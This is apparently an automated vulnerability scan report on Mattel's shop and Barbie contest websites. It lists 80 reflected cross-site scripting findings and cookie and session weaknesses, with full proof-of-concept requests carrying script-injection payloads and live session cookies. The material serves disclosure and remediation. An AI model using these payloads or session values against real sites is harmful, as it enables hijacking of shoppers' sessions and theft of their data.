Report for barbie.com, videogirlcontest.barbie.com and related entities

Report as of 12-23-2010 @ 0030 GMT

Report generated by XSS.CX at Thu Dec 23 00:30:11 CST 2010.


Cross Site Scripting in barbie.com and related properties



1. Cross-site scripting (reflected)

1.1. http://shop.mattel.com/affiliate/index.jsp [name of an arbitrarily supplied request parameter]

1.2. http://shop.mattel.com/affiliate/index.jsp [name of an arbitrarily supplied request parameter]

1.3. http://shop.mattel.com/brand/index.jsp [categoryId parameter]

1.4. http://shop.mattel.com/brand/index.jsp [categoryId parameter]

1.5. http://shop.mattel.com/brand/index.jsp [name of an arbitrarily supplied request parameter]

1.6. http://shop.mattel.com/brand/index.jsp [name of an arbitrarily supplied request parameter]

1.7. http://shop.mattel.com/cart/index.jsp [name of an arbitrarily supplied request parameter]

1.8. http://shop.mattel.com/cart/index.jsp [name of an arbitrarily supplied request parameter]

1.9. http://shop.mattel.com/category/index.jsp [categoryId parameter]

1.10. http://shop.mattel.com/category/index.jsp [categoryId parameter]

1.11. http://shop.mattel.com/category/index.jsp [jsessionid parameter]

1.12. http://shop.mattel.com/category/index.jsp [jsessionid parameter]

1.13. http://shop.mattel.com/category/index.jsp [name of an arbitrarily supplied request parameter]

1.14. http://shop.mattel.com/category/index.jsp [name of an arbitrarily supplied request parameter]

1.15. http://shop.mattel.com/emailSignup/index.jsp [name of an arbitrarily supplied request parameter]

1.16. http://shop.mattel.com/emailSignup/index.jsp [name of an arbitrarily supplied request parameter]

1.17. http://shop.mattel.com/family/index.jsp [cp parameter]

1.18. http://shop.mattel.com/family/index.jsp [cp parameter]

1.19. http://shop.mattel.com/family/index.jsp [jsessionid parameter]

1.20. http://shop.mattel.com/family/index.jsp [jsessionid parameter]

1.21. http://shop.mattel.com/family/index.jsp [name of an arbitrarily supplied request parameter]

1.22. http://shop.mattel.com/family/index.jsp [name of an arbitrarily supplied request parameter]

1.23. http://shop.mattel.com/giftCertificates/index.jsp [name of an arbitrarily supplied request parameter]

1.24. http://shop.mattel.com/giftCertificates/index.jsp [name of an arbitrarily supplied request parameter]

1.25. http://shop.mattel.com/helpdesk/index.jsp [display parameter]

1.26. http://shop.mattel.com/helpdesk/index.jsp [display parameter]

1.27. http://shop.mattel.com/helpdesk/index.jsp [jsessionid parameter]

1.28. http://shop.mattel.com/helpdesk/index.jsp [jsessionid parameter]

1.29. http://shop.mattel.com/helpdesk/index.jsp [name of an arbitrarily supplied request parameter]

1.30. http://shop.mattel.com/helpdesk/index.jsp [name of an arbitrarily supplied request parameter]

1.31. http://shop.mattel.com/helpdesk/index.jsp [stillHaveQuestion parameter]

1.32. http://shop.mattel.com/helpdesk/index.jsp [stillHaveQuestion parameter]

1.33. http://shop.mattel.com/helpdesk/index.jsp [subdisplay parameter]

1.34. http://shop.mattel.com/helpdesk/index.jsp [subdisplay parameter]

1.35. http://shop.mattel.com/home/index.jsp [jsessionid parameter]

1.36. http://shop.mattel.com/home/index.jsp [jsessionid parameter]

1.37. http://shop.mattel.com/home/index.jsp [locale parameter]

1.38. http://shop.mattel.com/home/index.jsp [locale parameter]

1.39. http://shop.mattel.com/home/index.jsp [name of an arbitrarily supplied request parameter]

1.40. http://shop.mattel.com/home/index.jsp [name of an arbitrarily supplied request parameter]

1.41. http://shop.mattel.com/product/index.jsp [cp parameter]

1.42. http://shop.mattel.com/product/index.jsp [cp parameter]

1.43. http://shop.mattel.com/product/index.jsp [name of an arbitrarily supplied request parameter]

1.44. http://shop.mattel.com/product/index.jsp [name of an arbitrarily supplied request parameter]

1.45. http://shop.mattel.com/productAlerts/index.jsp [name of an arbitrarily supplied request parameter]

1.46. http://shop.mattel.com/productAlerts/index.jsp [name of an arbitrarily supplied request parameter]

1.47. http://shop.mattel.com/reviews/submitReview.jsp [name of an arbitrarily supplied request parameter]

1.48. http://shop.mattel.com/reviews/submitReview.jsp [name of an arbitrarily supplied request parameter]

1.49. http://shop.mattel.com/shop/index.jsp [name of an arbitrarily supplied request parameter]

1.50. http://shop.mattel.com/shop/index.jsp [name of an arbitrarily supplied request parameter]

1.51. http://shop.mattel.com/sitemap/index.jsp [name of an arbitrarily supplied request parameter]

1.52. http://shop.mattel.com/sitemap/index.jsp [name of an arbitrarily supplied request parameter]

1.53. http://shop.mattel.com/storeLocator/index.jsp [name of an arbitrarily supplied request parameter]

1.54. http://shop.mattel.com/storeLocator/index.jsp [name of an arbitrarily supplied request parameter]

1.55. https://shop.mattel.com/affiliate/index.jsp [name of an arbitrarily supplied request parameter]

1.56. https://shop.mattel.com/affiliate/index.jsp [name of an arbitrarily supplied request parameter]

1.57. https://shop.mattel.com/brand/index.jsp [categoryId parameter]

1.58. https://shop.mattel.com/brand/index.jsp [categoryId parameter]

1.59. https://shop.mattel.com/brand/index.jsp [name of an arbitrarily supplied request parameter]

1.60. https://shop.mattel.com/brand/index.jsp [name of an arbitrarily supplied request parameter]

1.61. https://shop.mattel.com/checkout/index.jsp [name of an arbitrarily supplied request parameter]

1.62. https://shop.mattel.com/checkout/index.jsp [name of an arbitrarily supplied request parameter]

1.63. https://shop.mattel.com/emailSignup/index.jsp [name of an arbitrarily supplied request parameter]

1.64. https://shop.mattel.com/emailSignup/index.jsp [name of an arbitrarily supplied request parameter]

1.65. https://shop.mattel.com/giftCertificates/index.jsp [name of an arbitrarily supplied request parameter]

1.66. https://shop.mattel.com/giftCertificates/index.jsp [name of an arbitrarily supplied request parameter]

1.67. https://shop.mattel.com/product/wishlist/wishlist.jsp [name of an arbitrarily supplied request parameter]

1.68. https://shop.mattel.com/product/wishlist/wishlist.jsp [name of an arbitrarily supplied request parameter]

1.69. https://shop.mattel.com/storeLocator/index.jsp [name of an arbitrarily supplied request parameter]

1.70. https://shop.mattel.com/storeLocator/index.jsp [name of an arbitrarily supplied request parameter]

1.71. http://videogirlcontest.barbie.com/get_contest_entries [count parameter]

1.72. http://videogirlcontest.barbie.com/get_contest_entries [page parameter]

1.73. http://shop.mattel.com/ [Referer HTTP header]

1.74. http://shop.mattel.com/cartHandler/index.jsp [Referer HTTP header]

1.75. http://shop.mattel.com/category/index.jsp [Referer HTTP header]

1.76. http://shop.mattel.com/history/index.jsp [Referer HTTP header]

1.77. http://shop.mattel.com/home/index.jsp [Referer HTTP header]

1.78. http://shop.mattel.com/product/index.jsp [Referer HTTP header]

1.79. http://shop.mattel.com/search/controller.jsp [Referer HTTP header]

1.80. http://shop.mattel.com/shop/index.jsp [Referer HTTP header]

2. SSL cookie without secure flag set

2.1. https://shop.mattel.com/affiliate/index.jsp

2.2. https://shop.mattel.com/brand/index.jsp

2.3. https://shop.mattel.com/cart/index.jsp

2.4. https://shop.mattel.com/coreg/index.jsp

2.5. https://shop.mattel.com/coreg/index.jsp

2.6. https://shop.mattel.com/emailSignup/index.jsp

2.7. https://shop.mattel.com/giftCertificates/index.jsp

2.8. https://shop.mattel.com/product/wishlist/wishlist.jsp

2.9. https://shop.mattel.com/search/controller.jsp

2.10. https://shop.mattel.com/shop/index.jsp

2.11. https://shop.mattel.com/storeLocator/index.jsp

3. Session token in URL

3.1. http://shop.mattel.com/category/index.jsp

3.2. http://shop.mattel.com/family/index.jsp

3.3. http://shop.mattel.com/family/index.jsp

3.4. http://shop.mattel.com/helpdesk/index.jsp

3.5. http://shop.mattel.com/home/index.jsp

3.6. http://shop.mattel.com/product/index.jsp

4. Cookie without HttpOnly flag set

4.1. http://shop.mattel.com/product/index.jsp

4.2. https://shop.mattel.com/affiliate/index.jsp

4.3. https://shop.mattel.com/brand/index.jsp

4.4. https://shop.mattel.com/cart/index.jsp

4.5. https://shop.mattel.com/coreg/index.jsp

4.6. https://shop.mattel.com/coreg/index.jsp

4.7. https://shop.mattel.com/emailSignup/index.jsp

4.8. https://shop.mattel.com/giftCertificates/index.jsp

4.9. https://shop.mattel.com/product/wishlist/wishlist.jsp

4.10. https://shop.mattel.com/search/controller.jsp

4.11. https://shop.mattel.com/shop/index.jsp

4.12. https://shop.mattel.com/storeLocator/index.jsp

4.13. http://tracking.searchmarketing.com/gsic_welcome.asp

4.14. http://videogirlcontest.barbie.com/display_page

4.15. http://videogirlcontest.barbie.com/get_contest_entries

4.16. http://videogirlcontest.barbie.com/get_entry

4.17. http://b.scorecardresearch.com/b

4.18. http://pixel.fetchback.com/serve/fb/pdc

4.19. http://shop.mattel.com/category/index.jsp

4.20. http://shop.mattel.com/family/index.jsp

4.21. http://shop.mattel.com/history/index.jsp

4.22. http://shop.mattel.com/product/wishlist/wishlist.jsp

4.23. http://shop.mattel.com/search/controller.jsp

4.24. http://stats.clear-media.com/in.php

4.25. http://tags.mediaforge.com/if/146

4.26. http://tags.mediaforge.com/if/146/

4.27. http://www.barbie.com/videogirl/

5. Password field with autocomplete enabled

5.1. https://shop.mattel.com/checkout/index.jsp

5.2. https://shop.mattel.com/checkout/index.jsp

6. Source code disclosure

6.1. http://mat.imageg.net/cms_widgets/38/44/384418_assets/cruncher_largeloop2.flv

6.2. http://shop.mattel.com/affiliate/index.jsp

6.3. http://shop.mattel.com/brand/index.jsp

6.4. http://shop.mattel.com/cart/index.jsp

6.5. http://shop.mattel.com/category/index.jsp

6.6. http://shop.mattel.com/emailSignup/index.jsp

6.7. http://shop.mattel.com/family/index.jsp

6.8. http://shop.mattel.com/giftCertificates/index.jsp

6.9. http://shop.mattel.com/helpdesk/index.jsp

6.10. http://shop.mattel.com/home/index.jsp

6.11. http://shop.mattel.com/product/index.jsp

6.12. http://shop.mattel.com/productAlerts/index.jsp

6.13. http://shop.mattel.com/reviews/submitReview.jsp

6.14. http://shop.mattel.com/shop/index.jsp

6.15. http://shop.mattel.com/sitemap/index.jsp

6.16. http://shop.mattel.com/storeLocator/index.jsp

6.17. https://shop.mattel.com/affiliate/index.jsp

6.18. https://shop.mattel.com/brand/index.jsp

6.19. https://shop.mattel.com/emailSignup/index.jsp

6.20. https://shop.mattel.com/giftCertificates/index.jsp

6.21. https://shop.mattel.com/product/wishlist/wishlist.jsp

6.22. https://shop.mattel.com/storeLocator/index.jsp

7. Cookie scoped to parent domain

7.1. http://b.scorecardresearch.com/b

7.2. http://pixel.fetchback.com/serve/fb/pdc

7.3. http://tags.mediaforge.com/if/146

7.4. http://tags.mediaforge.com/if/146/

8. Cross-domain Referer leakage

8.1. http://corporate.mattel.com/mdn/js/gnav-75px.js

8.2. http://files.shoptog.com/Clients/Mattel/prod/target.js

8.3. http://shop.mattel.com/brand/index.jsp

8.4. http://shop.mattel.com/category/index.jsp

8.5. http://shop.mattel.com/category/index.jsp

8.6. http://shop.mattel.com/category/index.jsp

8.7. http://shop.mattel.com/category/index.jsp

8.8. http://shop.mattel.com/category/index.jsp

8.9. http://shop.mattel.com/category/index.jsp

8.10. http://shop.mattel.com/category/index.jsp

8.11. http://shop.mattel.com/category/index.jsp

8.12. http://shop.mattel.com/family/index.jsp

8.13. http://shop.mattel.com/family/index.jsp

8.14. http://shop.mattel.com/family/index.jsp

8.15. http://shop.mattel.com/family/index.jsp

8.16. http://shop.mattel.com/family/index.jsp

8.17. http://shop.mattel.com/family/index.jsp

8.18. http://shop.mattel.com/family/index.jsp

8.19. http://shop.mattel.com/family/index.jsp

8.20. http://shop.mattel.com/family/index.jsp

8.21. http://shop.mattel.com/family/index.jsp

8.22. http://shop.mattel.com/family/index.jsp

8.23. http://shop.mattel.com/family/index.jsp

8.24. http://shop.mattel.com/family/index.jsp

8.25. http://shop.mattel.com/family/index.jsp

8.26. http://shop.mattel.com/family/index.jsp

8.27. http://shop.mattel.com/family/index.jsp

8.28. http://shop.mattel.com/family/index.jsp

8.29. http://shop.mattel.com/family/index.jsp

8.30. http://shop.mattel.com/family/index.jsp

8.31. http://shop.mattel.com/family/index.jsp

8.32. http://shop.mattel.com/family/index.jsp

8.33. http://shop.mattel.com/family/index.jsp

8.34. http://shop.mattel.com/family/index.jsp

8.35. http://shop.mattel.com/family/index.jsp

8.36. http://shop.mattel.com/family/index.jsp

8.37. http://shop.mattel.com/family/index.jsp

8.38. http://shop.mattel.com/family/index.jsp

8.39. http://shop.mattel.com/family/index.jsp

8.40. http://shop.mattel.com/family/index.jsp

8.41. http://shop.mattel.com/family/index.jsp

8.42. http://shop.mattel.com/family/index.jsp

8.43. http://shop.mattel.com/family/index.jsp

8.44. http://shop.mattel.com/family/index.jsp

8.45. http://shop.mattel.com/family/index.jsp

8.46. http://shop.mattel.com/family/index.jsp

8.47. http://shop.mattel.com/family/index.jsp

8.48. http://shop.mattel.com/family/index.jsp

8.49. http://shop.mattel.com/family/index.jsp

8.50. http://shop.mattel.com/family/index.jsp

8.51. http://shop.mattel.com/family/index.jsp

8.52. http://shop.mattel.com/family/index.jsp

8.53. http://shop.mattel.com/family/index.jsp

8.54. http://shop.mattel.com/family/index.jsp

8.55. http://shop.mattel.com/family/index.jsp

8.56. http://shop.mattel.com/helpdesk/index.jsp

8.57. http://shop.mattel.com/home/index.jsp

8.58. http://shop.mattel.com/home/index.jsp

8.59. http://shop.mattel.com/home/index.jsp

8.60. http://shop.mattel.com/product/index.jsp

8.61. http://shop.mattel.com/shop/index.jsp

8.62. http://shop.mattel.com/shop/index.jsp

8.63. http://shop.mattel.com/shop/index.jsp

8.64. http://shop.mattel.com/shop/index.jsp

8.65. http://shop.mattel.com/shop/index.jsp

8.66. http://shop.mattel.com/shop/index.jsp

8.67. http://shop.mattel.com/shop/index.jsp

8.68. https://shop.mattel.com/brand/index.jsp

8.69. https://shop.mattel.com/checkout/index.jsp

8.70. http://videogirlcontest.barbie.com/display_page

9. Cross-domain script include

9.1. http://shop.mattel.com/affiliate/index.jsp

9.2. http://shop.mattel.com/brand/index.jsp

9.3. http://shop.mattel.com/cart/index.jsp

9.4. http://shop.mattel.com/category/index.jsp

9.5. http://shop.mattel.com/emailSignup/index.jsp

9.6. http://shop.mattel.com/family/index.jsp

9.7. http://shop.mattel.com/family/index.jsp

9.8. http://shop.mattel.com/giftCertificates/index.jsp

9.9. http://shop.mattel.com/helpdesk/index.jsp

9.10. http://shop.mattel.com/home/index.jsp

9.11. http://shop.mattel.com/min-cat/site-js.xml.min.js

9.12. http://shop.mattel.com/product/index.jsp

9.13. http://shop.mattel.com/productAlerts/index.jsp

9.14. http://shop.mattel.com/reviews/submitReview.jsp

9.15. http://shop.mattel.com/shop/index.jsp

9.16. http://shop.mattel.com/sitemap/index.jsp

9.17. http://shop.mattel.com/storeLocator/index.jsp

9.18. https://shop.mattel.com/affiliate/index.jsp

9.19. https://shop.mattel.com/brand/index.jsp

9.20. https://shop.mattel.com/checkout/index.jsp

9.21. https://shop.mattel.com/emailSignup/index.jsp

9.22. https://shop.mattel.com/giftCertificates/index.jsp

9.23. https://shop.mattel.com/min-cat/site-js.xml.min.js

9.24. https://shop.mattel.com/product/wishlist/wishlist.jsp

9.25. https://shop.mattel.com/storeLocator/index.jsp

9.26. http://www.barbie.com/videogirl/

10. Email addresses disclosed

10.1. http://shop.mattel.com/shop/index.jsp

10.2. http://shop.mattel.com/shop/index.jsp

10.3. https://shop.mattel.com/brand/index.jsp

10.4. https://shop.mattel.com/checkout/index.jsp

10.5. https://shop.mattel.com/checkout/index.jsp

10.6. https://shop.mattel.com/giftCertificates/index.jsp

10.7. https://shop.mattel.com/storeLocator/index.jsp

10.8. http://videogirlcontest.barbie.com/display_page

10.9. http://videogirlcontest.barbie.com/global/share/js/jqModal.js

10.10. http://videogirlcontest.barbie.com/public/css/jqModal.css

10.11. http://www.barbie.com/videogirl/_swf/home-video-01.swf

11. Cacheable HTTPS response

11.1. https://shop.mattel.com/affiliate/index.jsp

11.2. https://shop.mattel.com/brand/index.jsp

11.3. https://shop.mattel.com/emailSignup/index.jsp

11.4. https://shop.mattel.com/giftCertificates/index.jsp

11.5. https://shop.mattel.com/storeLocator/index.jsp

12. Multiple content types specified

12.1. http://tags.mediaforge.com/if/146

12.2. http://tags.mediaforge.com/if/146/

13. HTML does not specify charset

14. Content type incorrectly stated

14.1. http://9d060c.r.axf8.net/mr/a.gif

14.2. http://cdn.triggertag.gorillanation.com/js/3711_US.php

14.3. http://corporate.mattel.com/mdn/js/gnav-75px.js

14.4. http://mat.imageg.net/cms_widgets/38/44/384418_assets/cruncher_largeloop2.flv

14.5. http://pixel.fetchback.com/serve/fb/pdc

14.6. http://statse.webtrendslive.com//wtid.js

14.7. http://videogirlcontest.barbie.com/global/__utm.gif

14.8. http://videogirlcontest.barbie.com/global/js/metrics-ga.js

14.9. http://videogirlcontest.barbie.com/global/share/js/jqModal.js

14.10. http://videogirlcontest.barbie.com/global/share/js/jquery.js

14.11. http://videogirlcontest.barbie.com/global/share/js/swfobject.js

14.12. http://videogirlcontest.barbie.com/global/share/js/util.js

14.13. http://videogirlcontest.barbie.com/global/share/js/validator.js

14.14. http://www.barbie.com/videogirl/_img/background_v.jpg



1. Cross-site scripting (reflected)
There are 80 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://shop.mattel.com/affiliate/index.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /affiliate/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b0809"-alert(1)-"1880324d77a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /affiliate/index.jsp?b0809"-alert(1)-"1880324d77a=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:15:27 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 38154


                                                                                    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/
...[SNIP]...
<script type="text/javascript">
   if(ess){}else{
       var ess = {};
   }
   
   
           ess['locale']="en_US";
   
   
       ess['server']="http://shop.mattel.com";
    ess['qs']="b0809"-alert(1)-"1880324d77a=1";
   </script>
...[SNIP]...

1.2. http://shop.mattel.com/affiliate/index.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /affiliate/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 5e87b--><script>alert(1)</script>1e6ec6e0f69 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /affiliate/index.jsp?5e87b--><script>alert(1)</script>1e6ec6e0f69=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:15:28 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 38196


                                                                                    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/
...[SNIP]...
<!-- === Request Query String: 5e87b--><script>alert(1)</script>1e6ec6e0f69=1 -->
...[SNIP]...

1.3. http://shop.mattel.com/brand/index.jsp [categoryId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /brand/index.jsp

Issue detail

The value of the categoryId request parameter is copied into an HTML comment. The payload 43c97--><script>alert(1)</script>e030957103d was submitted in the categoryId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /brand/index.jsp?categoryId=376813143c97--><script>alert(1)</script>e030957103d HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:15:12 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 31245


                                                                                        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.o
...[SNIP]...
<!-- === Request Query String: categoryId=376813143c97--><script>alert(1)</script>e030957103d -->
...[SNIP]...

1.4. http://shop.mattel.com/brand/index.jsp [categoryId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /brand/index.jsp

Issue detail

The value of the categoryId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3da6d"-alert(1)-"8a42c67e1e8 was submitted in the categoryId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /brand/index.jsp?categoryId=37681313da6d"-alert(1)-"8a42c67e1e8 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:15:11 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 31213


                                                                                        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.o
...[SNIP]...
<script type="text/javascript">
   if(ess){}else{
       var ess = {};
   }
   
   
           ess['locale']="en_US";
   
   
       ess['server']="http://shop.mattel.com";
    ess['qs']="categoryId=37681313da6d"-alert(1)-"8a42c67e1e8";
   </script>
...[SNIP]...

1.5. http://shop.mattel.com/brand/index.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /brand/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload a0b95--><script>alert(1)</script>cbd1ff41310 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

